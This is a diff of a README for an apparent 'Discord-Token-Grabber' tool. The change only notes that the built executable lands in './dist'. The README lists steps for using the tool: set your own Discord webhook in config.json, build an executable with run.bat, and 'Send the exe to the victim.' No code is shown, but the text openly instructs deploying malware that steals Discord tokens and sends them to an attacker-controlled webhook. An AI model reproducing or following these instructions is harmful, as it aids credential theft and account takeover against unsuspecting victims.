quiet69/Discord-Token-Grabber/README.md

  1. Create a webhook on your Discord server.
  2. Change the 'webhook' value to your Discord webhook URL in config.json
  3. Make sure python is installed.
- 4. Run "run.bat" and executable will be automatically generated.
+ 4. Run "run.bat" and executable will be automatically generated in './dist' folder.
  5. Send the exe to the victim.
  6. Viola!